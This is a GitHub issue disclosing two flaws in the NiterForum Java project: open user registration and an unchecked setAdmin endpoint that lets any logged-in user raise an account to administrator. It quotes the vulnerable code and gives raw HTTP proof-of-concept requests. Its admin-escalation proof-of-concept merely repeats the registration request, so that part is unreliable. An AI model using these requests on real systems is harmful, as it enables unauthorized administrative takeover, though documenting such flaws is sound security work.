We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
code: /NiterForum/src/main/java/cn/niter/forum/api/SsoApi.java row68-83:
@ResponseBody//@ResponseBody返回json格式的数据 @RequestMapping(value = "/register", method = RequestMethod.POST) public Object register(HttpServletRequest request, @RequestParam("name") String name, @RequestParam("password") String password, @RequestParam("type") Integer type, HttpServletResponse response) { //1为手机号,2为邮箱号 ResultDTO resultDTO = (ResultDTO)userService.register(type,name,password); if(200==resultDTO.getCode()){ Cookie cookie = cookieUtils.getCookie("token",""+resultDTO.getData(),86400*3); response.addCookie(cookie); } return resultDTO; }
Any user can add users through this interface
return: {"typ":"JWT","alg":"HS256"}{"vipRank":0,"avatarUrl":"/images/avatar/8.jpg","groupId":1,"iss":"NiterUser","name":"邮箱用户_h5ith","id":776,"exp":1661850834} query database,successfully added:
{"typ":"JWT","alg":"HS256"}{"vipRank":0,"avatarUrl":"/images/avatar/8.jpg","groupId":1,"iss":"NiterUser","name":"邮箱用户_h5ith","id":776,"exp":1661850834}
at NiterForum/src/main/java/cn/niter/forum/controller/AdminController.java row 113-136:
@PostMapping("/user2588/setAdmin/id") @ResponseBody public Map<String,Object> setQuestionById(HttpServletRequest request, @RequestParam(name = "id",defaultValue = "0") Long id) { UserDTO user = (UserDTO)request.getAttribute("loginUser"); //UserAccount userAccount = (UserAccount) request.getSession().getAttribute("userAccount"); if (user == null) { throw new CustomizeException(CustomizeErrorCode.NO_LOGIN); } Map<String,Object> map = new HashMap<>(); UserAccount userAccount = new UserAccount(); userAccount.setGroupId(19); UserAccountExample userAccountExample = new UserAccountExample(); userAccountExample.createCriteria().andUserIdEqualTo(id); if(userAccountMapper.updateByExampleSelective(userAccount,userAccountExample)==1){ map.put("code",200); map.put("message","恭喜您,设置成功!"); } return map; } }
This interface does not perform permission verification, and any user can access it after logging in.
POST /api/sso/register HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 40 Origin: http://127.0.0.1:8080 Connection: close Referer: http://127.0.0.1:8080/sso/register Cookie: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
name=[email protected]&password=123456&type=2
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Vulnerability Details
Any registered user
code:
/NiterForum/src/main/java/cn/niter/forum/api/SsoApi.java row68-83:
Any user can add users through this interface
return:
{"typ":"JWT","alg":"HS256"}{"vipRank":0,"avatarUrl":"/images/avatar/8.jpg","groupId":1,"iss":"NiterUser","name":"邮箱用户_h5ith","id":776,"exp":1661850834}
query database,successfully added:
Add administrator without authority
at
NiterForum/src/main/java/cn/niter/forum/controller/AdminController.java row 113-136:
This interface does not perform permission verification, and any user can access it after logging in.
POC:
Any registered user
POST /api/sso/register HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/sso/register
Cookie:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
name=[email protected]&password=123456&type=2
Add administrator without authority
POST /api/sso/register HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/sso/register
Cookie:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
name=[email protected]&password=123456&type=2
The text was updated successfully, but these errors were encountered: